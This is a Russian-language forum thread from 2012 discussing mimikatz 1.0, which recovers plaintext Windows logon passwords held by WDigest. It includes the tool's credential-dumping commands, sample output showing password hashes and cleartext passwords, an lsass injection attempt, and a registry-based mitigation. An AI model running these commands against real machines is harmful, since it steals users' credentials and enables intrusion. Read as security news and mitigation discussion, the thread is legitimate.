Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Архив » Новости и события Microsoft » Обнаружена опасная уязвимость в Microsoft Windows

 
Настройки темы
Обнаружена опасная уязвимость в Microsoft Windows
exo exo вне форума

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442


Конфигурация

Профиль | Отправить PM | Цитировать


Изменения
Автор: exo
Дата: 01-08-2012
Локальный пользователь может получить доступ к потенциально важным данным. Возможно данная угроза исключена при использовании HIPS
Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.
Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.
Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

privilege::debug
sekurlsa::logonPasswords full

Вывод будет примерно следующим:
Цитата:
Authentification Id : 0;210550
Package d'authentification : Kerberos
Utilisateur principal : user
Domaine d'authentification : domain
msv1_0 :
* Utilisateur : user
* Domaine : domain
* Hash LM : 25d934a376b906731d71060d896b7a46
* Hash NTLM : 13b98a9edbce8ef280527c9dd2725ea0
kerberos :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
wdigest :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
tspkg :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
новость взял отсюда
скачать утилиту можно отсюда

лично проверил (вин 7, 2008 R2) - работает только под администратором. В предыдущей версии утилиты антивирусы с HISP могли блокировать доступ. С неё помощью можно мигрировать пароли пользователей, если нужна очень "тихая" миграция.

-------
Вежливый клиент всегда прав!


Отправлено: 18:50, 21-02-2012

 

Ветеран


Сообщения: 508
Благодарности: 140

Профиль | Отправить PM | Цитировать


Печально... и никаких "противоядий" нету?

Отправлено: 22:38, 21-02-2012 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


Цитата snark:
и никаких "противоядий" нету? »
ищу варианты с удалением пароля после выхода из системы. после перезагрузки - пароля нет.

-------
Вежливый клиент всегда прав!


Отправлено: 23:39, 21-02-2012 | #3


Ветеран


Сообщения: 3487
Благодарности: 507

Профиль | Сайт | Отправить PM | Цитировать


http://devteev.blogspot.com/2012/02/0day-lsa.html
Противоядие здесь, но если о нем не знает атакующий.

Цитата:
В качестве временного решения можно отключить поставщика безопасности wdigest через соответствующую ветвь реестра (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке.
Однако пригодится штуковина.

-------
Просьба обращаться на "ты".

Это сообщение посчитали полезным следующие участники:

Отправлено: 00:17, 22-02-2012 | #4

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


Цитата Severny:
Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке. »
если у него прав хватит на реестр.

-------
Вежливый клиент всегда прав!


Отправлено: 00:25, 22-02-2012 | #5


Аватара для Delirium

Ветеран


Сообщения: 5624
Благодарности: 936

Профиль | Отправить PM | Цитировать


Цитата exo:
Если пользователь имеет права локального администратора, он может получить пароли всех пользователей, которые работали до него без перезагрузки компьютера... в том числе и доменного админа... »
Если пользователь локальный админ - тушите свечи сразу.
А доменному админу вооообще нечего делать локально на машине, для этого должны существовать отдельные учетные записи.
А вообще интересно.

-------

Пройденные курсы:
[Microsoft №10174 Sharepoint], [SharePoint]
Мои проекты:[CheckAdmins], [NetSend7], [System Uptime], [Remote RAdmin LogViewer],[Netdom GDI], [Holidays - напоминалка о днях рождения]

А я офис-гуру :)

Это сообщение посчитали полезным следующие участники:

Отправлено: 01:57, 22-02-2012 | #6


Ветеран


Сообщения: 3487
Благодарности: 507

Профиль | Сайт | Отправить PM | Цитировать


Цитата exo:
если у него прав хватит на реестр. »
С правами сложности у атакующего могут возникнуть, а так на всякий случай лежит собственная regedit.exe в комплекте.

-------
Просьба обращаться на "ты".


Отправлено: 19:57, 22-02-2012 | #7

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


решил я тут на днях вспомнить как это делается. Не получается: при проверке lsass.exe отказано в доступе. Может какие обновления были в винде...
Или от того, что NOD32 установили... но на компе без антивируса - всё работает...

-------
Вежливый клиент всегда прав!


Последний раз редактировалось exo, 25-07-2012 в 20:22.


Отправлено: 20:05, 25-07-2012 | #8


Аватара для winbond

Ветеран


Сообщения: 651
Благодарности: 58

Профиль | Отправить PM | Цитировать


На 8 и 2012 неактуально. cmd под админом:

"mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 636
Erreur : Impossible d'injecter ! ; (0x00000005) Отказано в доступе.

mimikatz # @getLogonPasswords
Erreur : pas ou plus de communication etablie"

-------
Меня многие спрашивают, как я живу с тремя головами... На самом деле, я триедин, как Великие Бобы.
Вчера - надо сегодня, сегодня - надо вчера. Жизнь странная штука.


Отправлено: 01:14, 27-07-2012 | #9

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


вот тоже самое получаю в некоторых 7-ых компах..

-------
Вежливый клиент всегда прав!


Отправлено: 01:51, 27-07-2012 | #10



Компьютерный форум OSzone.net » Архив » Новости и события Microsoft » Обнаружена опасная уязвимость в Microsoft Windows

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Вопрос - [решено] сайты с якобы "обнаружена уязвимость" exo Защита компьютерных систем 6 08-03-2011 22:50
Обнаружена новая критическая уязвимость в CSS-подсистеме браузера Internet Explorer OSZone News Новости и события Microsoft 0 14-12-2010 00:30
Microsoft решила не исправлять недавно найденную уязвимость в Windows XP OSZone News Новости и события Microsoft 11 20-09-2009 23:40
В безопасности IE8 снова обнаружена уязвимость OSZone News Новости и события Microsoft 4 23-03-2009 09:17
Microsoft Internet Explorer - обнаружена ошибка... Zluk Microsoft Windows 95/98/Me (архив) 6 31-03-2005 23:41




 
Переход